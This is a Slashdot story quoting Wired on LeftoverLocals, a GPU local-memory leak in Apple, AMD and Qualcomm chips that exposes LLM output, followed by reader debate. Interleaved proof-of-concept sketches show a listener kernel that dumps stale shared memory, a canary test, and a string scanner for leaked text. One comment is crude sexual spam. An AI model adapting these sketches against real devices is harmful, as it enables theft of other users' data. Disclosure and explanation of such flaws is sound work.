A Flaw In Millions of Apple, AMD, and Qualcomm GPUs Could Expose AI Data (wired.com)

An anonymous reader quotes a report from Wired: As more companies ramp up development of artificial intelligence systems, they are increasingly turning to graphics processing unit (GPU) chips for the computing power they need to run large language models (LLMs) and to crunch data quickly at massive scale. Between video game processing and AI, demand for GPUs has never been higher, and chipmakers are rushing to bolster supply. In new findings released today, though, researchers are highlighting a vulnerability in multiple brands and models of mainstream GPUs -- including Apple, Qualcomm, and AMD chips -- that could allow an attacker to steal large quantities of data from a GPU's memory. The silicon industry has spent years refining the security of central processing units, or CPUs, so they don't leak data in memory even when they are built to optimize for speed. However, since GPUs were designed for raw graphics processing power, they haven't been architected to the same degree with data privacy as a priority. As generative AI and other machine learning applications expand the uses of these chips, though, researchers from New York-based security firm Trail of Bits say that vulnerabilities in GPUs are an increasingly urgent concern. "There is a broader security concern about these GPUs not being as secure as they should be and leaking a significant amount of data," Heidy Khlaaf, Trail of Bits' engineering director for AI and machine learning assurance, tells WIRED. "We're looking at anywhere from 5 megabytes to 180 megabytes. In the CPU world, even a bit is too much to reveal."

To exploit the vulnerability, which the researchers call LeftoverLocals, attackers would need to already have established some amount of operating system access on a target's device. Modern computers and servers are specifically designed to silo data so multiple users can share the same processing resources without being able to access each other's data. But a LeftoverLocals attack breaks down these walls. Exploiting the vulnerability would allow a hacker to exfiltrate data they shouldn't be able to access from the local memory of vulnerable GPUs, exposing whatever data happens to be there for the taking, which could include queries and responses generated by LLMs as well as the weights driving the response. In their proof of concept, demonstrated in an animation in Wired's article, the researchers show an attack where a target -- shown on the left -- asks the open source LLM llama.cpp to provide details about WIRED magazine. Within seconds, the attacker's device -- shown on the right -- collects the majority of the response provided by the LLM by carrying out a LeftoverLocals attack on vulnerable GPU memory. The attack program the researchers created uses less than 10 lines of code. [...] Though exploiting the vulnerability would require some amount of existing access to targets' devices, the potential implications are significant given that it is common for highly motivated attackers to carry out hacks by chaining multiple vulnerabilities together. Furthermore, establishing "initial access" to a device is already necessary for many common types of digital attacks.
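
To make this concrete, here is a minimal sketch of a "listener" along the lines Trail of Bits describe: a kernel that declares local (shared) memory, never writes to it, and copies whatever stale contents it finds out to a buffer the host can read. Trail of Bits' actual proofs of concept target OpenCL, Metal, and Vulkan, and Nvidia GPUs were not found vulnerable, so the CUDA syntax below is purely a convenient notation for the idea; the kernel name, sizes, and launch parameters are illustrative, not the researchers' code.

    #include <cstdio>
    #include <cuda_runtime.h>

    #define LM_WORDS 4096  // shared-memory words dumped per block (illustrative size)

    // Hypothetical "listener": reads local/shared memory it never wrote,
    // copying out whatever a previous kernel left behind.
    __global__ void listener(unsigned int *dump) {
        volatile __shared__ unsigned int lm[LM_WORDS];
        for (int i = threadIdx.x; i < LM_WORDS; i += blockDim.x)
            dump[blockIdx.x * LM_WORDS + i] = lm[i];  // stale words go to the host
    }

    int main() {
        const int blocks = 32;
        unsigned int *dump;  // host-visible buffer for the recovered words
        cudaMallocManaged(&dump, blocks * LM_WORDS * sizeof(unsigned int));
        listener<<<blocks, 256>>>(dump);  // an ordinary, unprivileged launch
        cudaDeviceSynchronize();
        printf("first recovered word: 0x%08x\n", dump[0]);
        cudaFree(dump);
        return 0;
    }

On hardware that scrubs local memory between kernels, the dump comes back zeroed; on a vulnerable GPU it can contain another process's leftovers, which is the entire bug.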
The researchers did not find evidence that Nvidia, Intel, or Arm GPUs contain the LeftoverLocals vulnerability, but Apple, Qualcomm, and AMD all confirmed to WIRED that they are impacted. Here's what each of the affected companies had to say about the vulnerability, as reported by Wired:

Apple: An Apple spokesperson acknowledged LeftoverLocals and noted that the company shipped fixes with its latest M3 and A17 processors, which it unveiled at the end of 2023. This means that the vulnerability is seemingly still present in millions of existing iPhones, iPads, and MacBooks that depend on previous generations of Apple silicon. On January 10, the Trail of Bits researchers retested the vulnerability on a number of Apple devices. They found that Apple's M2 MacBook Air was still vulnerable, but the third-generation iPad Air with an A12 chip appeared to have been patched.
Qualcomm: A Qualcomm spokesperson told WIRED that the company is "in the process" of providing security updates to its customers, adding, "We encourage end users to apply security updates as they become available from their device makers." The Trail of Bits researchers say Qualcomm confirmed it has released firmware patches for the vulnerability.
AMD: AMD released a security advisory on Wednesday detailing its plans to offer fixes for LeftoverLocals. The protections will be "optional mitigations" released in March.
Google: For its part, Google says in a statement that it "is aware of this vulnerability impacting AMD, Apple, and Qualcomm GPUs. Google has released fixes for ChromeOS devices with impacted AMD and Qualcomm GPUs."

  • by GlobalEcho ( 26240 ) on Thursday January 18, 2024 @08:17AM (#64169555)

    Is there really much of interest to exfiltrators? The article discusses LLMs (since that is the trendy use of GPUs). Well, the training data for those is typically far from sensitive. Similarly for coefficients, especially if the set isn't complete.

    Perhaps a better case for data security concerns can be made for screen representations with visible passwords. But generally speaking sensitive stuff is in regular memory and the CPU.

    • People are [going to be] training in-house LLMs with sensitive data. So if you're talking about a ChatGPT then it's pretty irrelevant, but if you're talking about someone's internal model that they're using to deliver domain-specific information, to summarize trends in PII, or similar, there's going to be plenty of valuable data in there.

      • GPUs need to begin to integrate the security features of CPUs now that they are being used more heavily for operations that require security; however, the attack requires a foothold in what should be a secure corporate network, so this will likely always be more of a netsec issue to mitigate than a GPU/LLM issue.
        • I don't really disagree with what you said, but defense in depth is a basic tenet of security. Yes, secure the OS against intrusion, but also secure the software against misuse by a logged in user. Not all attackers come from outside.

      • by znrt ( 2424692 )

        yes, and to get to that data they have to be able to inject code into your gpu, meaning that before they do they already own your system and could have exfiltrated literally everything from it, or be silently watching all of your activity, not just your conversation with a language model.

        • Wrong. They have to have gained access to your system, but by default that lets them run code on your GPU without letting them bypass file security, meaning that access to the GPU gives them access to things they otherwise could not see on your system. They don't need to be root. (See the sketch after this thread.)

    • Attackers with access to your operating system could be defiling your barely-legal teens before they even get to your monitor. If the freshness of fresh-faced goo-glazed teen tramps matters at all to you, you'll see why this is a huge problem.

    • The en-masse users (like LLMs, even the private ones) won't have a real problem with this - the attacker's got to get onto the system running the GPU, and if they've done that, there are far bigger problems than what they might extract from the GPU.

      Little old me on my M1 Mac is more of a concern - I'm far more likely to have "someone else's code" running on my computer, and I'm far less likely to carefully control what goes into my GPU (I could barely tell you what it's used for, or when). They're unlikel
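
To illustrate the "they don't need to be root" point from the thread above, here is a hedged sketch of the two-step canary experiment Trail of Bits describe: one launch stamps a known pattern into local memory in the role of the victim, and a second, unrelated launch checks whether the pattern survived. Nothing here requires elevated privileges, only the ability to submit work to the GPU driver. As before, CUDA is used purely as notation (Nvidia was not found vulnerable), and every name and size is made up for illustration.

    #include <cstdio>
    #include <cuda_runtime.h>

    #define LM_WORDS 1024
    #define CANARY   0xdeadbeefu

    // "Victim" side: stamp a recognizable pattern into shared memory.
    __global__ void writer() {
        volatile __shared__ unsigned int lm[LM_WORDS];
        for (int i = threadIdx.x; i < LM_WORDS; i += blockDim.x)
            lm[i] = CANARY;
    }

    // "Attacker" side: a later launch counts how many canary words survived.
    __global__ void listener(unsigned int *hits) {
        volatile __shared__ unsigned int lm[LM_WORDS];
        for (int i = threadIdx.x; i < LM_WORDS; i += blockDim.x)
            if (lm[i] == CANARY) atomicAdd(hits, 1u);
    }

    int main() {
        unsigned int *hits;
        cudaMallocManaged(&hits, sizeof(unsigned int));
        *hits = 0;
        writer<<<1, 256>>>();        // victim workload runs and exits...
        cudaDeviceSynchronize();
        listener<<<1, 256>>>(hits);  // ...then the attacker looks for leftovers
        cudaDeviceSynchronize();
        printf("%u of %u canary words survived\n", *hits, LM_WORDS);
        cudaFree(hits);
        return 0;
    }

A count of zero means local memory was scrubbed between launches; a nonzero count across process boundaries is exactly what LeftoverLocals demonstrates. File permissions never enter into it, which is why the attacker does not need root.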

  • There are lots of problems with Nvidia and I'm definitely not in love with their pricing, but are there still people out there who doubt that they are multiple times more competent at writing software than AMD? There are really only two players in this space, although Intel is trying harder than usual, so they may well take the #2 spot from AMD if the AMD devs don't figure out how to write a decent driver sometime soon. (March?)

    If there's big news here it's that Intel doesn't appear to be vulnerable to this kind of attack.

    • by RedK ( 112790 )

      > but are there still people out there who doubt that they are multiple times more competent at writing software than AMD?

      Yes, everyone who had to get a GPU running on Linux. AMD is tons easier and better.

      • > but are there still people out there who doubt that they are multiple times more competent at writing software than AMD?

        Yes, everyone who had to get a GPU running on Linux. AMD is tons easier and better.

        One installer, following the instructions, zero deviations from them, driver and CUDA installed and working. If you find downloading and running an installer to be difficult, then Slashdot is not for you.

        • by wiggles ( 30088 )

          Compared to just working out of the box? Yep. AMD wins.

          I am 90% switched to Linux thanks to AMD. All my games work now.

          Nvidia was such a pain in the arse with their proprietary packages. AMD's Open Source modules are far superior on Linux.

      • by gweihir ( 88907 )

        Indeed. Same here. One reason Nvidia is on my "do not buy" list.

    • Nvidia had this same basic vulnerability discovered in their drivers and patched years back already, before anyone was paying much attention to the others. I think this is more about the rising level of scrutiny upon the other vendors as their products begin to attain relevant performance levels for busting into markets people care about.

      • That's still good for Nvidia and bad for everyone else though, again except for Intel for a change. If Nvidia faced this problem and solved it then it should have been obvious to everyone else.

  • by thegarbz ( 1787294 ) on Thursday January 18, 2024 @10:47AM (#64169915)

    I liken this to the same risks with the CPU. Great in theory, not so good in practice. To exfiltrate data meaningfully you need to know what to look for (see the sketch after this comment), and you need to time it in a way that lets you get at the data; otherwise you're exfiltrating massive amounts of data, which is unlikely to go unnoticed even if the system has the bandwidth to do so on the fly.

    The same applies on the GPU, just at a different scale. TFS talks about 5 to 180MB. Start any AI training or processing workload and you instantly peg your GPU memory; you're literally moving 10s to 100s of GB of data around.

    I take issue with TFS's point that even a single bit is too much. That's only true if you can accurately control which bit, and have the required knowledge to target it. This is where all these attacks fail from a practical point of view: the amount of information needed about the target system virtually requires you to already be the administrator on it, at which point, why bother with such a convoluted attack?
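
For what it's worth, the llama.cpp demo works despite the "know what to look for" objection because LLM output is plain text, which is easy to pick out of a raw dump with no other knowledge of the target. A toy post-processing pass might look like the following ordinary host-side C++ (hypothetical helper, not the researchers' tooling):

    #include <cstdio>
    #include <cctype>
    #include <vector>

    // Scan a raw memory dump and print every run of printable ASCII longer
    // than min_len. Leaked LLM responses show up as readable sentences in a
    // sea of floating-point weights and garbage.
    void find_strings(const std::vector<unsigned char> &dump, size_t min_len = 8) {
        size_t start = 0, run = 0;
        for (size_t i = 0; i <= dump.size(); ++i) {
            if (i < dump.size() && isprint(dump[i])) {
                if (run == 0) start = i;
                ++run;
            } else {
                if (run >= min_len)
                    printf("%.*s\n", (int)run, (const char *)&dump[start]);
                run = 0;
            }
        }
    }

So the needle-in-a-haystack defense holds up for weights and intermediate tensors, but much less so for chat sessions, which is presumably why the proof of concept targets them.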

  • Sure, the vulnerability technically exists. Abstractly. But telling me that millions of phones have it implies there's some reason those people should be concerned. The article seems to say that people who have gained access to a system running the LLM processes can, in effect, listen in on parts of RAM.

    But is there a corresponding risk on a phone? I mean... at all? Seems like an idle curiosity for those technically interested, but the idea that anybody's going to run around trying to patch old iPhone models seems far-fetched.
